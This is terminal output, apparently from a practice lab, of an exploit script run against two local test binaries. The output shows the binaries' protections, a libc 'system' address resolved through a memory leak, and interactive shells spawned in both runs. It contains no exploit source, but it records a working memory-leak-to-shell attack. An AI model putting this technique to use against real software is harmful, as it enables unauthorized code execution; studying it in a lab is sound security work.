ex@Ex:~/test$ ./exp.py [+] Starting local process './leak_x64': Done [*] '/home/ex/test/leak_x64' Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE [+] Loading from '/home/ex/test/leak_x64': 0x7f19d1b2c170 [+] Resolving 'system' in 'libc.so': 0x7f19d1b2c170 [!] No ELF provided. Leaking is much faster if you have a copy of the ELF being leaked. [*] Magic did not match [*] .gnu.hash/.hash, .strtab and .symtab offsets [*] Found DT_GNU_HASH at 0x7f19d18fcbe0 [*] Found DT_STRTAB at 0x7f19d18fcbf0 [*] Found DT_SYMTAB at 0x7f19d18fcc00 [*] .gnu.hash parms [*] hash chain index [*] hash chain [+] system_addr: 0x7f19d1561440 [*] Switching to interactive mode $ id uid=1000(ex) gid=1000(ex) groups=1000(ex),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),112(lpadmin),127(sambashare),129(wireshark),132(docker) $ [*] Interrupted [*] Stopped program './leak_x64' ex@Ex:~/test$ ./exp.py [+] Starting local process './leak_x86': Done [*] '/home/ex/test/leak_x86' Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE [+] Loading from '/home/ex/test/leak_x86': 0xf7f05940 [+] Resolving 'system' in 'libc.so': 0xf7f05940 [!] No ELF provided. Leaking is much faster if you have a copy of the ELF being leaked. [*] Trying lookup based on Build ID: 0e188ec5f09c187a7a92784d4b97aa251b15a93c [*] Downloading data from GitHub [-] Downloading 'https://gitlab.com/libcdb/libcdb/raw/master/hashes/build_id/0e188ec5f09c187a7a92784d4b97aa251b15a93c': Got code 404 [*] .gnu.hash/.hash, .strtab and .symtab offsets [*] Found DT_GNU_HASH at 0xf7eb5d9c [*] Found DT_STRTAB at 0xf7eb5da4 [*] Found DT_SYMTAB at 0xf7eb5dac [*] .gnu.hash parms [*] hash chain index [*] hash chain [+] system_addr: 0xf7d1b200 [*] Switching to interactive mode $ id uid=1000(ex) gid=1000(ex) groups=1000(ex),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),112(lpadmin),127(sambashare),129(wireshark),132(docker) $ [*] Interrupted [*] Stopped program './leak_x86'
|